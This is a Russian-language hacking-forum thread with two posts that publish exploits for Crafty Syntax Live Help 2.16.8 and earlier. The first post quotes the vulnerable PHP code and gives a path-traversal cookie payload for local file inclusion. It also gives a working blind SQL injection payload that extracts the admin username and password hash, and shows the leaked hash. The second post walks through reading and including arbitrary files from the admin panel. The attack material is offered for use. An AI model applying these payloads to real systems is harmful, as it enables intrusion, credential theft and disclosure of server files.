Старый 06.08.2010, 15:31   #1
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию Crafty Syntax Live Help

Продукт: Crafty Syntax Live Help <= 2.16.8 LFI & Blind SQL Injection
Офф сайт: www.craftysyntax.com
Зависимости: LFI - Windows only , magic_quotes = Off / Blind SQL Injection - Windows only
Уязвимые файлы: /admin_common.php, /data_messages.php
Уязвимый кусок кода:

Файл admin_common.php:
PHP код:
if(!(empty($_COOKIE['speaklanguage']))){ $CSLH_Config['speaklanguage']  = $_COOKIE['speaklanguage']; }


               . . . . . . .

 
$languagefile "lang/lang-" $CSLH_Config['speaklanguage'] . ".php";
 if(!(
file_exists($languagefile))){
     
$languagefile "lang/lang-.php";
 }    
 include(
$languagefile); 

Файл data_messages.php:
PHP код:
$whatYm $UNTRUSTED['year'] . $UNTRUSTED['month'];

               . . . . . . .

 
$query "SELECT * FROM livehelp_leavemessage WHERE dateof>$whatYm_b AND dateof<$whatYm_e $whichdepartmentsql order by dateof DESC"
Exploit LFI:
http://target/craftysyntax/admin_common.php
Cookie: speaklanguage=/../../../../../../../../../../boot.ini%00

Exploit Blind SQL Injection:
http://target/craftysyntax/admin_common.php

Post: year=0 union select * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT concat_ws(0x3a,username,password) FROM livehelp_users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT concat_ws(0x3a,username,password) FROM livehelp_users LIMIT 1), 14)e) b)a#

Cookie: speaklanguage=/../../data_messages

Цитата:
Result:
( 1060 : Duplicate column name 'admin:96e79218965eb72c92a549dd5a330112' )

Последний раз редактировалось (dm); 19.08.2010 в 01:18.. Причина: изменение заголовка
asddas вне форума   Ответить с цитированием
Старый 28.04.2011, 18:18   #2
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию

Продукт: Crafty Syntax Live Help (LFI/File disclosure)
Офф сайт: www.craftysyntax.com
Зависимости: Admin, LFI - magic_quotes = Off

При получении админских привелегий, заодно получаем читалку и локальный инклуд. Для эксплуатации делаем следующее:

Заходим в раздел Departments, добавляем новый, либо редактируем имеющийся кликнув на Settings. Для чтения файлов изменяем Leave Message Image на ../../../file/you/need/to/read (макс. 255 символов) и жмём UPDATE. Далее следуем по линку http://localhost/livehelp/image.php?what=getstate&department=xxx, где xxx номер отдела который вы редактировали. Сохраняем картинку, любуемся содержимым.

Для проведения LFI, там же, в разделе настроек, в самом низу редактируем, либо подменяем при отправке - Color Scheme на ../../../../../file/you/need/to/include%00 (макс. 255 символов). Инклудим это дело - http://localhost/livehelp/visitor_common.php?department=xxx

P.S. При создании нового Department не забываем его удалить
asddas вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot